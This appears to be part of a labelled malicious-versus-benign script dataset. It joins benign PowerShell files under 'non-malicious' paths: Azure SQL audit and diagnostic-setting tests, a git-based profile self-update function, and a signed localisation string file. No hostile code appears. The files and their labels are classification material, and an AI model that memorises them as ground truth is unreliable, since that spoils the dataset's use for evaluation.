$policy.AuditActionGroup.Length Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Set-AzSqlServerAudit -EventHubTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count "6" Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count "7" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId Set-AzSqlServerAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Enabled" $policy.LogAnalyticsTargetState Assert-AreEqual $workspaceResourceId $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count "8" $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights Set-AzSqlServerAudit -LogAnalyticsTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-Null $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count "9" Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $settingsName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-Null $policy.WorkspaceResourceId Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Set-AzSqlServerAudit -EventHubTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Assert-AreEqual 0 (Get-AzDiagnosticSetting -ResourceId $resourceId).count } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-RemoveDatabaseAuditingSettingsMultipleDiagnosticSettings { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/" + $params.databaseName try { $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-Null $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Set-AzSqlDatabaseAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Category SQLSecurityAuditEvents -WorkspaceId $workspaceResourceId Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual 0 $policy.AuditAction.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $foundAuditCategory = $False Foreach ($log in $diagnostics[0].Logs) { if ($log.Category -eq "SQLSecurityAuditEvents") { $foundAuditCategory = $True Assert-AreEqual $False $log.Enabled break } } Assert-AreEqual $True $foundAuditCategory } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-RemoveServerAuditingSettingsMultipleDiagnosticSettings { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $subscriptionId = (Get-AzContext).Subscription.Id $workspaceResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.operationalinsights/workspaces/" + $params.workspaceName $eventHubAuthorizationRuleResourceId = "/subscriptions/" + $subscriptionId + "/resourcegroups/" + $params.rgname + "/providers/microsoft.EventHub/namespaces/" + $params.eventHubNamespace + "/authorizationrules/RootManageSharedAccessKey" $resourceId = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $params.rgname + "/providers/Microsoft.Sql/servers/" + $params.serverName + "/databases/master" try { $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 0 $policy.AuditActionGroup.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId Set-AzSqlServerAudit -EventHubTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -EventHubAuthorizationRuleResourceId $eventHubAuthorizationRuleResourceId -BlobStorageTargetState Enabled -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Enabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual "" $policy.PredicateExpression Assert-AreEqual $eventHubAuthorizationRuleResourceId $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $settingsName = ($diagnostics)[0].Name Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Name $settingsName -Category SQLInsights Set-AzDiagnosticSetting -ResourceId $resourceId -Enabled $True -Category SQLSecurityAuditEvents -WorkspaceId $workspaceResourceId Assert-AreEqual 2 (Get-AzDiagnosticSetting -ResourceId $resourceId).count Remove-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual "Disabled" $policy.EventHubTargetState Assert-AreEqual 3 $policy.AuditActionGroup.Length Assert-AreEqual "" $policy.PredicateExpression Assert-Null $policy.EventHubAuthorizationRuleResourceId Assert-Null $policy.EventHubNamespace Assert-AreEqual "Disabled" $policy.LogAnalyticsTargetState Assert-Null $policy.WorkspaceResourceId $diagnostics = Get-AzDiagnosticSetting -ResourceId $resourceId Assert-AreEqual 1 ($diagnostics).count $foundAuditCategory = $False Foreach ($log in $diagnostics[0].Logs) { if ($log.Category -eq "SQLSecurityAuditEvents") { $foundAuditCategory = $True Assert-AreEqual $False $log.Enabled break } } Assert-AreEqual $True $foundAuditCategory } finally { Remove-BlobAuditingTestEnvironment $testSuffix } }
combined_dataset/train/non-malicious/593.ps1
593.ps1
function Update-PowerShellPowerUp{ if(!(Get-Command "git" -ErrorAction SilentlyContinue)){ Install-PPApp Git } cd $PSProfile.Path if(!(Test-Path -Path (Join-Path -Path $PSProfile.Path -ChildPath ".git"))){ git init git remote add origin $PSProfile.GitSource }elseif($(git config --get remote.origin.url) -ne $PSProfile.GitSource){ git remote set-url origin $PSProfile.GitSource } git fetch origin git reset --hard origin/master Set-Location $WorkingPath }
combined_dataset/train/non-malicious/sample_18_71.ps1
sample_18_71.ps1
ConvertFrom-StringData @' id_lockingkb296264check=Checking Opportunistic Locking id_lockingkb296264checkdesc=Checking if Opportunistic Locking is disabled '@ # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDEaqX/nUgILcpU # r30Pe64EoVEMVO8iyyA3Fh/z9vASYqCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEII+5hKqi5xW/n9mMquYgbTfK # 8giQB9mtiNTUT0WEqJYQMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAmvWOLGJQSzhiHnvKYTsMQJC97zBAmoyYSP3PPC6dOGFbw9jpDNnKl4SN # TsQOS5PHFa96P85GpWoRe3z+FaEFRXr1Hlakmxdw/KWW3eEsZ3MfyBCAHmiT1GlI # 8BathgCRECGx0xzuBBgWyT+wIYylmQTFD1eBctqk4+FYZOUyfADqzcvqoCotwS8E # j8RLEqe6biRGxy9iXZHCLttoAnPrSKzy5weHR0To5kdUOro2WIIjR6mw84NWGP49 # 6ivmey/MrlwwvmqpLDuXju7RjaxMmGfGVStaiqMU7uthJb/17x7MSPTcWmZWVOOo # IYezfUS5w7vzV9WuSXBH2MfsDuDvk6GCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBdsIC5IQdJjWlYhQJB2+eAJgNjep9LvpKV5Rnr4C8IDwIGZxqBxlfr # GBMyMDI0MTAyODExNDA0MC4xNjFaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQABAAAB6DANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6eVwdGlF6YgpU7weOFBkp # W9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/CdvDyeZFAcZ6l2+nlMssmZy # C8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482VutKS4wZT6bNVnBVsChr2 # AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi1qYNmR8i7T1luj2JdFdf # ZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1OMXBwGaRoJTYtksi9njuq # 4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/HmdAn4koMWKUDwH5sd/zDu # 4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdAxBobWdorqwvzqL70Wdsg # DU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yCedkz69787s8nIp55icLf # DoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5sqXWCXv++hek4A15WybI # c6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uWaXElLHOXIlieKF2i/YzQ # 6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzotSx/5fo9g7fCzoFjk3tD # EwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kMfRVQba6T34HwelLaMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi74km6PKAkni9+BWotq+Qt # DGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppYJEA+pb6o2qPjFddO1TLq # vSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8I5Oi1RegMJl8t5k/UtE0 # Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGbtw4LCHsT2pFakpGOBh+I # SUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7rJ+HsiP4sdqBjj6Avopuf # 4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19CPvkUwxYK0uZvPl2WC39 # nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt+eLOeuGDjvhJvYMIEkpk # V68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ9yuxMddoMMQ19Tkyftot # 6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2WnxuFMy5fbAK6o8PWz8Q # RMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj/vCXaAFcmkW1nk7VE+ow # aXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzXA6a8CiamcQW/DgmLJpiV # QNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # 